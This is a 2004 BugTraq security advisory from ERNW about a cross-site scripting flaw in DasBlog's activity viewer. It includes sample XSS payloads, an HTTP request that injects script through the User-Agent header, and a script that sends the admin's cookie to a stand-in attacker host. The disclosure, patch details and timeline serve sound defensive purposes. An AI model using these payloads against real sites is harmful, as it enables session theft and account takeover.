BugTraq
Cross-Site Scripting Vulnerability in Newtelligence DasBlog Sep 01 2004 06:19AM
Dominick Baier (seclists leastprivilege com)
ERNW Security Advisory

Cross-Site Scripting Vulnerability in Newtelligence DasBlog

Author:
Dominick Baier <dbaier (at) ernw (dot) de [email concealed]>

1. Summary:
A XSS (Cross-Site-Scripting) Vulnerability in DasBlog's Event and Activity
Viewer allows to inject and execute code on the client's machine. This
allows an attacker to transfer the ASP.NET authentication cookie to a server
of his choice. The attacker can use this cookie to log on to DasBlog and
modify blog entries and configuration settings.

2. Severity : Critical

3. Systems affected

DasBlog Versions:
All

Browsers
Tested with IE 6 and Firefox 0.93

4. Patch Availability :
http://www.gotdotnet.com/workspaces/releases/viewuploads.aspx?id=77a2912
8-47
46-4473-b676-e4f1517a1907
Vendor instructions
http://staff.newtelligence.net/clemensv/PermaLink.aspx?guid=69bce168-cb0
9-4f
09-8d53-f0b97f11b198

5. Details

The Activity and Events Viewer show details about requests that were made to
the blog site. As extra information they show the Referrers, Query Strings
and User Agents of these requests. It is possible to specially malform those
HTTP Headers to inject scripting code. This code gets embedded in the HTML
pages and executed on the client. With specially crafted JavaScript code a
attacker can transfer the ASP.NET Forms Authentication Cookie to a server of
the his choice. While injecting this cookie in a HTTP request to DasBlog he
can authenticate without having to know the username or the password and
enter the administrative area.

Examples of script injections

<script>alert('XSS')</script>
<img%20src="javascript:alert('XSS')">
<img%20src=javascript&
#x3a
;alert("XSS")>

Leading e.g. to the following HTTP request

GET / HTTP/1.1
User-Agent: <script>alert('xss')</script>
Host: www.victim.com\r\n
Accept: */*

Example of transferring a cookie using JavaScript

<script>document.location='http://www.evil-site.com/cookieEater.aspx?coo
kie=
'+document.cookie</script>

6. Solution
Install the patch.

7. Time-Line
The vulnerability was found on the 15th August 2004. The author was
contacted on the same day with a immediate response. The patch has been
provided on the 30.August 2004

8. Disclaimer

The informations in this advisory are provided "AS IS" without warranty
of any kind. In no event shall the authors be liable for any damages
whatsoever including direct, indirect, incidental, consequential,
loss of business profits or special damages due to the misuse of any
information provided in this advisory.

---
Dominick Baier, Dipl. Ing. Informationstechnik (BA)
.NET Architecture / Security Consultant
www.leastprivilege.com

ERNW GmbH / Zähringerstr. 49 / 69115 Heidelberg
Tel. +49 151 16 22 75 56 / Fax. +49 6221 419 008
dbaier (at) ernw (dot) de [email concealed] / www.ernw.de

PGP (www.ernw.de/keys/dbaier.zip)
7AE0 B3D2 7FFC 7763 E32A 07C2 8B0D F988 DC8D BFB1

X509v3 (www.ernw.de/keys/dbaier (at) ernw.de (dot) zip [email concealed])

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus